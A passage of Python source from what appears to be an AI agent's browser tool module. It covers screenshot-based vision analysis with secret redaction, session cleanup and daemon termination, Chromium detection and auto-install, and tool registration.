|
|
],
|
|
}
|
|
],
|
|
"temperature": vision_temperature,
|
|
"timeout": vision_timeout,
|
|
}
|
|
if vision_model:
|
|
call_kwargs["model"] = vision_model
|
|
try:
|
|
response = _lazy_call_llm(**call_kwargs)
|
|
except Exception as _api_err:
|
|
from tools.vision_tools import (
|
|
_is_image_size_error, _resize_image_for_vision, _RESIZE_TARGET_BYTES,
|
|
)
|
|
if not (_is_image_size_error(_api_err) and len(data_url) > _RESIZE_TARGET_BYTES):
|
|
raise
|
|
logger.info(
|
|
"Vision API rejected screenshot (%.1f MB); "
|
|
"auto-resizing to ~%.0f MB and retrying...",
|
|
len(data_url) / (1024 * 1024),
|
|
_RESIZE_TARGET_BYTES / (1024 * 1024),
|
|
)
|
|
data_url = _resize_image_for_vision(screenshot_path, mime_type="image/png")
|
|
call_kwargs["messages"][0]["content"][1]["image_url"]["url"] = data_url
|
|
response = _lazy_call_llm(**call_kwargs)
|
|
|
|
analysis = (response.choices[0].message.content or "").strip()
|
|
# Redact secrets the vision LLM may have read from the screenshot.
|
|
from agent.redact import redact_sensitive_text
|
|
return redact_sensitive_text(analysis)
|
|
|
|
|
|
def browser_vision(question: str, annotate: bool = False, task_id: Optional[str] = None) -> Union[str, Dict[str, Any]]:
|
|
"""Screenshot the current page for visual inspection (CAPTCHAs, images, layouts).
|
|
|
|
Native-vision models get the screenshot attached to the conversation (a
|
|
multimodal tool-result envelope); otherwise the auxiliary vision model
|
|
returns a text analysis as JSON. Either way the file is saved persistently
|
|
and its path returned so it can be shared via MEDIA:<path>.
|
|
``annotate`` overlays numbered [N] labels on interactive elements.
|
|
"""
|
|
if _is_camofox_mode():
|
|
from tools.browser_camofox import camofox_vision
|
|
return camofox_vision(question, annotate, task_id)
|
|
|
|
import uuid as uuid_mod
|
|
from hermes_constants import get_hermes_dir
|
|
screenshots_dir = get_hermes_dir("cache/screenshots", "browser_screenshots")
|
|
screenshot_path = screenshots_dir / f"browser_screenshot_{uuid_mod.uuid4().hex}.png"
|
|
effective_task_id = _last_session_key(task_id or "default")
|
|
|
|
# ── Private-network guard: block vision from eval-navigated private pages ──
|
|
blocked = _blocked_private_page_content(effective_task_id)
|
|
if blocked is not None:
|
|
return blocked
|
|
|
|
_lp_prerouted, _lp_fallback_warning, screenshot_path = _lightpanda_vision_preroute(
|
|
effective_task_id, annotate, screenshot_path,
|
|
)
|
|
|
|
try:
|
|
screenshots_dir.mkdir(parents=True, exist_ok=True)
|
|
# Prune old screenshots (older than 24 hours) to prevent unbounded disk growth
|
|
_cleanup_old_screenshots(screenshots_dir, max_age_hours=24)
|
|
|
|
if _lp_prerouted and screenshot_path.exists():
|
|
result = _annotate_lightpanda_fallback(
|
|
{"success": True, "data": {"path": str(screenshot_path)}},
|
|
_LP_VISION_FALLBACK_REASON,
|
|
)
|
|
else:
|
|
screenshot_args = ["--annotate"] if annotate else []
|
|
screenshot_args += ["--full", str(screenshot_path)]
|
|
result = _run_browser_command(
|
|
effective_task_id,
|
|
"screenshot",
|
|
screenshot_args,
|
|
# If the Lightpanda pre-route already failed, force Chrome so
|
|
# _run_browser_command doesn't trigger a redundant LP fallback.
|
|
_engine_override="auto" if _lp_prerouted else None,
|
|
)
|
|
|
|
if not result.get("success"):
|
|
error_detail = result.get("error", "Unknown error")
|
|
error_response = {
|
|
"success": False,
|
|
"error": f"Failed to take screenshot ({_vision_mode_label()} mode): {error_detail}"
|
|
}
|
|
return json.dumps(_copy_fallback_warning(error_response, result), ensure_ascii=False)
|
|
|
|
actual_screenshot_path = result.get("data", {}).get("path")
|
|
if actual_screenshot_path:
|
|
screenshot_path = Path(actual_screenshot_path)
|
|
|
|
if not screenshot_path.exists():
|
|
return json.dumps({
|
|
"success": False,
|
|
"error": (
|
|
f"Screenshot file was not created at {screenshot_path} ({_vision_mode_label()} mode). "
|
|
f"This may indicate a socket path issue (macOS /var/folders/), "
|
|
f"a missing Chromium install ('agent-browser install'), "
|
|
f"or a stale daemon process."
|
|
),
|
|
}, ensure_ascii=False)
|
|
|
|
# Fast path: native image routing for the active main model — attach the
|
|
# screenshot directly instead of describing it through an aux vision LLM
|
|
# (no aux call, no information loss; consistent with vision_analyze).
|
|
from tools.vision_tools import _should_use_native_vision_fast_path
|
|
|
|
if _should_use_native_vision_fast_path():
|
|
return _native_vision_result(screenshot_path, question, annotate, result, _lp_fallback_warning)
|
|
|
|
analysis = _analyze_screenshot_with_aux_llm(screenshot_path, question)
|
|
response_data = {
|
|
"success": True,
|
|
"analysis": analysis or "Vision analysis returned no content.",
|
|
"screenshot_path": str(screenshot_path),
|
|
}
|
|
_copy_fallback_warning(response_data, result)
|
|
if annotate and result.get("data", {}).get("annotations"):
|
|
response_data["annotations"] = result["data"]["annotations"]
|
|
return json.dumps(response_data, ensure_ascii=False)
|
|
|
|
except Exception as e:
|
|
# Keep the screenshot if it was captured — the failure is in the vision
|
|
# analysis, not the capture, and deleting it loses evidence the user may
|
|
# need. The 24-hour cleanup bounds disk growth.
|
|
logger.warning("browser_vision failed: %s", e, exc_info=True)
|
|
error_info = {"success": False, "error": f"Error during vision analysis: {str(e)}"}
|
|
if screenshot_path.exists():
|
|
error_info["screenshot_path"] = str(screenshot_path)
|
|
error_info["note"] = "Screenshot was captured but vision analysis failed. You can still share it via MEDIA:<path>."
|
|
_copy_fallback_warning(error_info, result if 'result' in locals() else {})
|
|
return json.dumps(error_info, ensure_ascii=False)
|
|
|
|
|
|
def _cleanup_old_screenshots(screenshots_dir, max_age_hours=24):
|
|
"""Remove browser screenshots older than max_age_hours to prevent disk bloat.
|
|
|
|
Throttled to run at most once per hour per directory to avoid repeated
|
|
scans on screenshot-heavy workflows.
|
|
"""
|
|
key = str(screenshots_dir)
|
|
now = time.time()
|
|
if now - _last_screenshot_cleanup_by_dir.get(key, 0.0) < 3600:
|
|
return
|
|
_last_screenshot_cleanup_by_dir[key] = now
|
|
|
|
try:
|
|
cutoff = time.time() - (max_age_hours * 3600)
|
|
for f in screenshots_dir.glob("browser_screenshot_*.png"):
|
|
try:
|
|
if f.stat().st_mtime < cutoff:
|
|
f.unlink()
|
|
except Exception as e:
|
|
logger.debug("Failed to clean old screenshot %s: %s", f, e)
|
|
except Exception as e:
|
|
logger.debug("Screenshot cleanup error (non-critical): %s", e)
|
|
|
|
|
|
def _cleanup_old_recordings(max_age_hours=72):
|
|
"""Remove browser recordings older than max_age_hours to prevent disk bloat."""
|
|
try:
|
|
hermes_home = get_hermes_home()
|
|
recordings_dir = hermes_home / "browser_recordings"
|
|
if not recordings_dir.exists():
|
|
return
|
|
cutoff = time.time() - (max_age_hours * 3600)
|
|
for f in recordings_dir.glob("session_*.webm"):
|
|
try:
|
|
if f.stat().st_mtime < cutoff:
|
|
f.unlink()
|
|
except Exception as e:
|
|
logger.debug("Failed to clean old recording %s: %s", f, e)
|
|
except Exception as e:
|
|
logger.debug("Recording cleanup error (non-critical): %s", e)
|
|
|
|
|
|
# ============================================================================
|
|
# Cleanup and Management Functions
|
|
# ============================================================================
|
|
|
|
def _drop_last_active_binding(task_id: str) -> None:
|
|
"""Drop stale last-active ownership after cleaning ``task_id``.
|
|
|
|
Cleaning a bare task drops its binding; cleaning a sidecar drops the binding
|
|
only if that sidecar was still the recorded owner — so a later
|
|
click/snapshot can't resurrect a cleaned sidecar on about:blank while a
|
|
primary-session binding is preserved.
|
|
"""
|
|
if _is_local_sidecar_key(task_id):
|
|
bare_task_id = _bare_task_id_for_session_key(task_id)
|
|
if _last_active_session_key.get(bare_task_id) == task_id:
|
|
_last_active_session_key.pop(bare_task_id, None)
|
|
else:
|
|
_last_active_session_key.pop(task_id, None)
|
|
|
|
|
|
def cleanup_browser(task_id: Optional[str] = None) -> None:
|
|
"""Clean up browser session(s) for a task (task completion / inactivity timeout).
|
|
|
|
A bare task id reaps BOTH the primary session and any hybrid local sidecar
|
|
spawned for it; a key already carrying ``::local`` (inactivity loop) reaps
|
|
only that one.
|
|
"""
|
|
if task_id is None:
|
|
task_id = "default"
|
|
|
|
session_keys = [task_id]
|
|
if not _is_local_sidecar_key(task_id):
|
|
sidecar_key = f"{task_id}{_LOCAL_SUFFIX}"
|
|
with _cleanup_lock:
|
|
if sidecar_key in _active_sessions:
|
|
session_keys.append(sidecar_key)
|
|
|
|
for session_key in session_keys:
|
|
_cleanup_single_browser_session(session_key)
|
|
_drop_last_active_binding(task_id)
|
|
|
|
|
|
def _kill_verified_daemon(socket_dir: str, session_name: str) -> bool:
|
|
"""Tree-kill the daemon recorded in ``<socket_dir>/<session>.pid`` if it is verifiably ours.
|
|
|
|
The .pid file lives in a world-writable temp dir and PIDs recycle: the
|
|
process must pass ``_verify_reapable_browser_daemon`` and have a start-time
|
|
fingerprint (so the kill refuses if the PID is swapped between check and
|
|
kill). Returns True when a kill was issued. Never raises.
|
|
"""
|
|
pid_file = os.path.join(socket_dir, f"{session_name}.pid")
|
|
if not os.path.isfile(pid_file):
|
|
return False
|
|
try:
|
|
from tools.process_registry import ProcessRegistry
|
|
daemon_pid = int(Path(pid_file).read_text(encoding="utf-8").strip())
|
|
if not _verify_reapable_browser_daemon(daemon_pid, socket_dir, session_name):
|
|
logger.debug(
|
|
"Skipped daemon kill for %s: pid %s failed identity "
|
|
"verification", session_name, daemon_pid)
|
|
return False
|
|
from gateway.status import get_process_start_time
|
|
daemon_start = get_process_start_time(daemon_pid)
|
|
if daemon_start is None:
|
|
logger.debug(
|
|
"Skipped daemon kill for %s: no start-time "
|
|
"fingerprint for pid %s", session_name, daemon_pid)
|
|
return False
|
|
ProcessRegistry._terminate_host_pid(daemon_pid, daemon_start)
|
|
logger.debug("Killed daemon pid %s for %s", daemon_pid, session_name)
|
|
return True
|
|
except (ProcessLookupError, ValueError, PermissionError, OSError):
|
|
logger.debug("Could not kill daemon pid for %s (already dead or inaccessible)", session_name)
|
|
return False
|
|
|
|
|
|
def _release_session_resources(task_id: str, session_info: Dict[str, Any]) -> None:
|
|
"""Untrack ``task_id``, close its cloud provider session, kill its daemon.
|
|
|
|
The unconditional tail of ``_cleanup_single_browser_session``; also the
|
|
whole of the janitor's force-reap path, which skips the polite
|
|
agent-browser/Camofox ``close`` that kept failing but must still release
|
|
the cloud session and the local Chromium.
|
|
"""
|
|
bb_session_id = session_info.get("bb_session_id", "unknown")
|
|
with _cleanup_lock:
|
|
_active_sessions.pop(task_id, None)
|
|
_session_last_activity.pop(task_id, None)
|
|
_session_owner_homes.pop(task_id, None)
|
|
_cleanup_failures.pop(task_id, None)
|
|
|
|
# Cloud mode only — local sidecars have bb_session_id=None.
|
|
if bb_session_id:
|
|
provider = _get_cloud_provider()
|
|
if provider is not None:
|
|
try:
|
|
provider.close_session(bb_session_id)
|
|
except Exception as e:
|
|
logger.warning("Could not close cloud browser session: %s", e)
|
|
|
|
session_name = session_info.get("session_name", "")
|
|
if session_name:
|
|
socket_dir = os.path.join(_socket_safe_tmpdir(), f"agent-browser-{session_name}")
|
|
if os.path.exists(socket_dir):
|
|
_kill_verified_daemon(socket_dir, session_name)
|
|
shutil.rmtree(socket_dir, ignore_errors=True)
|
|
|
|
|
|
def _force_reap_browser_session(task_id: str) -> None:
|
|
"""Janitor last resort after repeated cleanup failures.
|
|
|
|
Skips the ``close`` round-trips that keep failing and goes straight to
|
|
``_release_session_resources`` (cloud close + daemon kill + untrack).
|
|
"""
|
|
_stop_cdp_supervisor(task_id)
|
|
with _cleanup_lock:
|
|
session_info = _active_sessions.get(task_id)
|
|
_session_last_activity.pop(task_id, None)
|
|
_recording_sessions.discard(task_id)
|
|
if session_info:
|
|
_release_session_resources(task_id, session_info)
|
|
_drop_last_active_binding(task_id)
|
|
|
|
|
|
def _cleanup_single_browser_session(task_id: str) -> None:
|
|
"""Internal: reap a single browser session by its exact session key."""
|
|
# Stop the CDP supervisor for this task FIRST so we close our WebSocket
|
|
# before the backend tears down the underlying CDP endpoint.
|
|
_stop_cdp_supervisor(task_id)
|
|
|
|
# Also clean up Camofox session if running in Camofox mode.
|
|
# Skip full close when managed persistence is enabled — the browser
|
|
# profile (and its session cookies) must survive across agent tasks.
|
|
# The inactivity reaper still frees idle resources.
|
|
if _is_camofox_mode():
|
|
try:
|
|
from tools.browser_camofox import camofox_close, camofox_soft_cleanup
|
|
if not camofox_soft_cleanup(task_id):
|
|
camofox_close(task_id)
|
|
except Exception as e:
|
|
logger.debug("Camofox cleanup for task %s: %s", task_id, e)
|
|
|
|
logger.debug("cleanup_browser called for task_id: %s", task_id)
|
|
logger.debug("Active sessions: %s", list(_active_sessions.keys()))
|
|
|
|
# Check if session exists (under lock), but don't remove yet -
|
|
# _run_browser_command needs it to build the close command.
|
|
with _cleanup_lock:
|
|
session_info = _active_sessions.get(task_id)
|
|
|
|
if session_info:
|
|
bb_session_id = session_info.get("bb_session_id", "unknown")
|
|
logger.debug("Found session for task %s: bb_session_id=%s", task_id, bb_session_id)
|
|
|
|
# Stop auto-recording before closing (saves the file)
|
|
_maybe_stop_recording(task_id)
|
|
|
|
# A Lightpanda session is a process Hermes spawned itself (Browser
|
|
# Use mode); there is no agent-browser daemon to send ``close`` to.
|
|
# An expired cloud CDP URL cannot accept an agent-browser close command.
|
|
# Avoid feeding it back through _get_session_info(), which would try to
|
|
# renew the session recursively while cleanup is still in progress.
|
|
if (session_info.get("features") or {}).get("lightpanda"):
|
|
try:
|
|
from tools.browser_lightpanda import stop_lightpanda
|
|
|
|
stop_lightpanda(session_info.get("session_name", ""))
|
|
except Exception as e:
|
|
logger.warning("lightpanda stop failed for task %s: %s", task_id, e)
|
|
elif _session_has_expired(session_info):
|
|
logger.debug(
|
|
"Skipping agent-browser close for expired session %s",
|
|
task_id,
|
|
)
|
|
else:
|
|
try:
|
|
_run_browser_command(task_id, "close", [], timeout=10)
|
|
logger.debug(
|
|
"agent-browser close command completed for task %s",
|
|
task_id,
|
|
)
|
|
except Exception as e:
|
|
logger.warning("agent-browser close failed for task %s: %s", task_id, e)
|
|
|
|
_release_session_resources(task_id, session_info)
|
|
|
|
logger.debug("Removed task %s from active sessions", task_id)
|
|
else:
|
|
logger.debug("No active session found for task_id: %s", task_id)
|
|
|
|
|
|
def cleanup_all_browsers() -> None:
|
|
"""
|
|
Clean up all active browser sessions.
|
|
|
|
Useful for cleanup on shutdown.
|
|
"""
|
|
with _cleanup_lock:
|
|
task_ids = list(_active_sessions.keys())
|
|
for task_id in task_ids:
|
|
cleanup_browser(task_id)
|
|
|
|
# Tear down CDP supervisors for all tasks so background threads exit.
|
|
try:
|
|
from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
|
|
SUPERVISOR_REGISTRY.stop_all()
|
|
except Exception:
|
|
pass
|
|
|
|
# Reset cached lookups so they are re-evaluated on next use.
|
|
global _cached_agent_browser, _agent_browser_resolved
|
|
global _cached_command_timeout, _command_timeout_resolved
|
|
global _cached_snapshot_threshold, _snapshot_threshold_resolved
|
|
global _cached_chromium_installed
|
|
global _cached_browser_engine, _browser_engine_resolved
|
|
_cached_agent_browser = None
|
|
_agent_browser_resolved = False
|
|
_discover_homebrew_node_dirs.cache_clear()
|
|
# Flip the resolved flag BEFORE nulling the cache so a concurrent
|
|
# reader never sees ``resolved=True`` with ``cache=None``.
|
|
_command_timeout_resolved = False
|
|
_cached_command_timeout = None
|
|
_snapshot_threshold_resolved = False
|
|
_cached_snapshot_threshold = None
|
|
_cached_chromium_installed = None
|
|
global _chromium_autoinstall_attempted
|
|
_chromium_autoinstall_attempted = False
|
|
_cached_browser_engine = None
|
|
_browser_engine_resolved = False
|
|
|
|
# ============================================================================
|
|
# Requirements Check
|
|
# ============================================================================
|
|
|
|
|
|
# Cache for Chromium discovery. Invalidated by _reset_browser_caches.
|
|
_cached_chromium_installed: Optional[bool] = None
|
|
|
|
|
|
def _chromium_search_roots() -> List[str]:
|
|
"""Directories to scan for a Chromium / headless-shell build, in the order
|
|
agent-browser and Playwright probe them: ``PLAYWRIGHT_BROWSERS_PATH``, then
|
|
Playwright's per-OS default cache."""
|
|
roots: List[str] = []
|
|
env_path = os.environ.get("PLAYWRIGHT_BROWSERS_PATH", "").strip()
|
|
if env_path and env_path != "0":
|
|
roots.append(env_path)
|
|
home = os.path.expanduser("~")
|
|
roots.append(os.path.join(home, ".cache", "ms-playwright"))
|
|
if sys.platform == "darwin":
|
|
roots.append(os.path.join(home, "Library", "Caches", "ms-playwright"))
|
|
if sys.platform == "win32":
|
|
local = os.environ.get("LOCALAPPDATA") or os.path.join(
|
|
home, "AppData", "Local"
|
|
)
|
|
roots.append(os.path.join(local, "ms-playwright"))
|
|
return roots
|
|
|
|
|
|
def _chromium_installed() -> bool:
|
|
"""Return True when a usable Chromium (or headless-shell) build is on disk.
|
|
|
|
Checks ``AGENT_BROWSER_EXECUTABLE_PATH``, then system Chrome/Chromium on
|
|
PATH, then Playwright's cache (``chromium-*`` / ``chromium_headless_shell-*``
|
|
dirs). Without a binary the CLI hangs on first use until the command
|
|
timeout fires, so the tool must not be advertised.
|
|
"""
|
|
global _cached_chromium_installed
|
|
if _cached_chromium_installed is not None:
|
|
return _cached_chromium_installed
|
|
|
|
# 1. AGENT_BROWSER_EXECUTABLE_PATH — explicit user-configured browser
|
|
ab_path = os.environ.get("AGENT_BROWSER_EXECUTABLE_PATH", "").strip()
|
|
if ab_path and (os.path.isfile(ab_path) or shutil.which(ab_path)):
|
|
_cached_chromium_installed = True
|
|
return True
|
|
|
|
# 2. System Chrome/Chromium in PATH (common names)
|
|
system_chrome = (
|
|
shutil.which("google-chrome")
|
|
or shutil.which("chromium")
|
|
or shutil.which("chromium-browser")
|
|
or shutil.which("chrome")
|
|
)
|
|
if system_chrome:
|
|
_cached_chromium_installed = True
|
|
return True
|
|
|
|
# 3. Playwright browser cache (legacy — chromium-* / chromium_headless_shell-* dirs)
|
|
for root in _chromium_search_roots():
|
|
if not root or not os.path.isdir(root):
|
|
continue
|
|
try:
|
|
entries = os.listdir(root)
|
|
except OSError:
|
|
continue
|
|
# Playwright names them ``chromium-<build>`` and
|
|
# ``chromium_headless_shell-<build>``; agent-browser accepts either.
|
|
for entry in entries:
|
|
if entry.startswith("chromium-") or entry.startswith(
|
|
"chromium_headless_shell-"
|
|
):
|
|
_cached_chromium_installed = True
|
|
return True
|
|
|
|
_cached_chromium_installed = False
|
|
return False
|
|
|
|
|
|
# One-shot per process: a 170MB download that fails (or is slow) must not be
|
|
# retried on every browser call. Reset by _reset_browser_caches() for tests.
|
|
_chromium_autoinstall_attempted = False
|
|
|
|
|
|
def _maybe_autoinstall_chromium() -> bool:
|
|
"""Best-effort, gated download of the Chromium *binary* on local cold start.
|
|
|
|
Binary only (``agent-browser install``), never ``--with-deps`` — that shells
|
|
``apt`` and needs root, so missing system libraries stay a user action.
|
|
Gated by ``security.allow_lazy_installs``, skipped in Docker (Chromium ships
|
|
in the image), attempted once per process. True only when Chromium is
|
|
present afterwards.
|
|
"""
|
|
global _chromium_autoinstall_attempted
|
|
if _chromium_autoinstall_attempted:
|
|
return _chromium_installed()
|
|
_chromium_autoinstall_attempted = True
|
|
|
|
if _running_in_docker():
|
|
return False
|
|
|
|
from tools.lazy_deps import _allow_lazy_installs
|
|
if not _allow_lazy_installs():
|
|
return False
|
|
|
|
try:
|
|
browser_cmd = _find_agent_browser()
|
|
except FileNotFoundError:
|
|
return False
|
|
|
|
if _is_npx_agent_browser_sentinel(browser_cmd):
|
|
install_cmd = [
|
|
_resolve_npx_bin() or "npx", "--ignore-scripts", "-y", AGENT_BROWSER_NPX_SPEC, "install",
|
|
]
|
|
else:
|
|
install_cmd = [browser_cmd, "install"]
|
|
|
|
logger.info(
|
|
"browser: Chromium missing — auto-installing the browser binary "
|
|
"(one-time ~170MB; disable via security.allow_lazy_installs)"
|
|
)
|
|
try:
|
|
proc = subprocess.run(
|
|
install_cmd,
|
|
capture_output=True,
|
|
text=True, encoding='utf-8', errors='replace',
|
|
timeout=600,
|
|
env=_build_browser_env(),
|
|
)
|
|
except (OSError, subprocess.SubprocessError) as e:
|
|
logger.warning("browser: Chromium auto-install failed to start: %s", e)
|
|
return False
|
|
|
|
if proc.returncode != 0:
|
|
tail = (proc.stderr or proc.stdout or "").strip()[-300:]
|
|
logger.warning(
|
|
"browser: Chromium auto-install exited %s: %s", proc.returncode, tail
|
|
)
|
|
return False
|
|
|
|
global _cached_chromium_installed
|
|
_cached_chromium_installed = None
|
|
return _chromium_installed()
|
|
|
|
|
|
def _running_in_docker() -> bool:
|
|
"""Best-effort detection of whether we're inside a Docker container."""
|
|
if os.path.exists("/.dockerenv"):
|
|
return True
|
|
try:
|
|
with open("/proc/1/cgroup", "rt", encoding="utf-8") as fp:
|
|
return "docker" in fp.read()
|
|
except OSError:
|
|
return False
|
|
|
|
|
|
def check_browser_requirements() -> bool:
|
|
"""Whether the browser tools should be advertised.
|
|
|
|
Local mode needs the ``agent-browser`` CLI plus a Chromium build (except
|
|
Lightpanda-only text workflows); cloud mode needs the CLI plus provider
|
|
credentials (the provider hosts its own Chromium).
|
|
"""
|
|
# Browser Use CLI backend — browser_exec replaces the whole browser_*
|
|
# surface (including browser_cdp/browser_dialog, whose check_fns funnel
|
|
# through here), so hide these tools from the model.
|
|
if _is_browser_use_cli_mode():
|
|
return False
|
|
|
|
# Camofox backend — only needs the server URL, no agent-browser CLI
|
|
if _is_camofox_mode():
|
|
return True
|
|
|
|
# CDP override mode can connect to an existing remote/local browser endpoint
|
|
# without requiring the local agent-browser binary on PATH.
|
|
# Raw (no-I/O) check: this runs during tool-schema assembly at startup,
|
|
# where a stale endpoint must not cost a blocking HTTP probe.
|
|
if _get_cdp_override_raw():
|
|
return True
|
|
|
|
# The agent-browser CLI is required for local launch and cloud-provider flows.
|
|
# Tool-schema assembly runs during Desktop startup; do not execute
|
|
# ``agent-browser --version`` here, because Windows .cmd shims route through
|
|
# cmd.exe and can flash a console before the user invokes any browser tool.
|
|
# Actual browser execution paths still validate the candidate before use.
|
|
try:
|
|
browser_cmd = _find_agent_browser(validate=False)
|
|
except FileNotFoundError:
|
|
return False
|
|
|
|
# On Termux, the bare npx fallback is too fragile to treat as a satisfied
|
|
# local browser dependency. Require a real install (global or local) so the
|
|
# browser tool is not advertised as available when it will likely fail on
|
|
# first use.
|
|
if _requires_real_termux_browser_install(browser_cmd):
|
|
return False
|
|
|
|
# In cloud mode, also require provider credentials. Cloud browsers
|
|
# don't need a local Chromium binary.
|
|
provider = _get_cloud_provider()
|
|
if provider is not None:
|
|
return provider.is_configured()
|
|
|
|
# Local mode with Lightpanda can provide text/navigation tools without a
|
|
# local Chromium install. Chrome fallback, screenshots, and browser_vision
|
|
# will still return actionable Chromium install errors if invoked.
|
|
if _using_lightpanda_engine():
|
|
return True
|
|
|
|
# Local Chrome mode: agent-browser needs a Chromium build on disk. Without
|
|
# it the CLI hangs on first use until the command timeout fires.
|
|
return _chromium_installed()
|
|
|
|
|
|
def check_browser_vision_requirements() -> bool:
|
|
"""Advertise ``browser_vision`` only with BOTH a working browser AND a vision
|
|
backend — otherwise it fails at call time with a cryptic provider error."""
|
|
if not check_browser_requirements():
|
|
return False
|
|
try:
|
|
from tools.vision_tools import check_vision_requirements
|
|
except ImportError:
|
|
return False
|
|
return check_vision_requirements()
|
|
|
|
|
|
# ============================================================================
|
|
# Module Test
|
|
# ============================================================================
|
|
|
|
if __name__ == "__main__":
|
|
"""
|
|
Simple test/demo when run directly
|
|
"""
|
|
print("🌐 Browser Tool Module")
|
|
print("=" * 40)
|
|
|
|
_cp = _get_cloud_provider()
|
|
mode = "local" if _cp is None else f"cloud ({_cp.provider_name()})"
|
|
print(f" Mode: {mode}")
|
|
|
|
# Check requirements
|
|
if check_browser_requirements():
|
|
print("✅ All requirements met")
|
|
else:
|
|
print("❌ Missing requirements:")
|
|
try:
|
|
browser_cmd = _find_agent_browser()
|
|
if _requires_real_termux_browser_install(browser_cmd):
|
|
print(" - bare npx fallback found (insufficient on Termux local mode)")
|
|
print(f" Install: {_browser_install_hint()}")
|
|
elif _cp is None and not _chromium_installed():
|
|
print(" - Chromium browser binary not found")
|
|
searched = ", ".join(_chromium_search_roots()) or "(no candidate paths)"
|
|
print(f" Searched: {searched}")
|
|
if _running_in_docker():
|
|
print(
|
|
" Docker: pull the latest image — the current one "
|
|
"predates the bundled Chromium install"
|
|
)
|
|
print(" docker pull ghcr.io/nousresearch/hermes-agent:latest")
|
|
else:
|
|
print(" Install it with:")
|
|
print(" npx agent-browser install --with-deps")
|
|
print(" Or: npx playwright install --with-deps chromium")
|
|
except FileNotFoundError:
|
|
print(" - agent-browser CLI not found")
|
|
print(f" Install: {_browser_install_hint()}")
|
|
if _cp is not None and not _cp.is_configured():
|
|
print(f" - {_cp.provider_name()} credentials not configured")
|
|
print(" Tip: set browser.cloud_provider to 'local' to use free local mode instead")
|
|
|
|
print("\n📋 Available Browser Tools:")
|
|
for schema in BROWSER_TOOL_SCHEMAS:
|
|
print(f" 🔹 {schema['name']}: {schema['description'][:60]}...")
|
|
|
|
print("\n💡 Usage:")
|
|
print(" from tools.browser_tool import browser_navigate, browser_snapshot")
|
|
print(" result = browser_navigate('https://example.com', task_id='my_task')")
|
|
print(" snapshot = browser_snapshot(task_id='my_task')")
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Registry
|
|
# ---------------------------------------------------------------------------
|
|
from tools.registry import registry, tool_error
|
|
from tools.browser_extension_router import (
|
|
extension_controller_available,
|
|
routed_browser_handler,
|
|
)
|
|
|
|
_BROWSER_SCHEMA_MAP = {s["name"]: s for s in BROWSER_TOOL_SCHEMAS}
|
|
|
|
|
|
def _browser_router_kw(kw: dict) -> dict:
|
|
"""Identity kwargs forwarded to the extension router wrapper."""
|
|
return {
|
|
"task_id": kw.get("task_id"),
|
|
"session_id": kw.get("session_id"),
|
|
}
|
|
|
|
|
|
def check_browser_routed_requirements(action: str = "browser_snapshot") -> bool:
|
|
"""Availability gate for tools that can use either browser backend."""
|
|
return check_browser_requirements() or extension_controller_available(action)
|
|
|
|
|
|
def check_browser_navigate_requirements() -> bool:
|
|
return check_browser_routed_requirements("browser_navigate")
|
|
|
|
|
|
def check_browser_snapshot_requirements() -> bool:
|
|
return check_browser_routed_requirements("browser_snapshot")
|
|
|
|
|
|
def check_browser_click_requirements() -> bool:
|
|
return check_browser_routed_requirements("browser_click")
|
|
|
|
|
|
def check_browser_type_requirements() -> bool:
|
|
return check_browser_routed_requirements("browser_type")
|
|
|
|
|
|
def check_browser_scroll_requirements() -> bool:
|
|
return check_browser_routed_requirements("browser_scroll")
|
|
|
|
|
|
def check_browser_back_requirements() -> bool:
|
|
return check_browser_routed_requirements("browser_back")
|
|
|
|
|
|
def check_browser_press_requirements() -> bool:
|
|
return check_browser_routed_requirements("browser_press")
|
|
|
|
|
|
registry.register(
|
|
name="browser_navigate",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_navigate"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_navigate",
|
|
args,
|
|
fallback=lambda: browser_navigate(url=args.get("url", ""), task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_navigate_requirements,
|
|
emoji="🌐",
|
|
)
|
|
registry.register(
|
|
name="browser_snapshot",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_snapshot"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_snapshot",
|
|
args,
|
|
fallback=lambda: browser_snapshot(
|
|
full=args.get("full", False), task_id=kw.get("task_id"), user_task=kw.get("user_task")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_snapshot_requirements,
|
|
emoji="📸",
|
|
)
|
|
registry.register(
|
|
name="browser_click",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_click"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_click",
|
|
args,
|
|
fallback=lambda: browser_click(ref=args.get("ref", ""), task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_click_requirements,
|
|
emoji="👆",
|
|
)
|
|
registry.register(
|
|
name="browser_type",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_type"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_type",
|
|
args,
|
|
fallback=lambda: browser_type(ref=args.get("ref", ""), text=args.get("text", ""), task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_type_requirements,
|
|
emoji="⌨️",
|
|
)
|
|
registry.register(
|
|
name="browser_scroll",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_scroll"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_scroll",
|
|
args,
|
|
fallback=lambda: browser_scroll(direction=args.get("direction", "down"), task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_scroll_requirements,
|
|
emoji="📜",
|
|
)
|
|
registry.register(
|
|
name="browser_back",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_back"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_back",
|
|
args,
|
|
fallback=lambda: browser_back(task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_back_requirements,
|
|
emoji="◀️",
|
|
)
|
|
registry.register(
|
|
name="browser_press",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_press"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_press",
|
|
args,
|
|
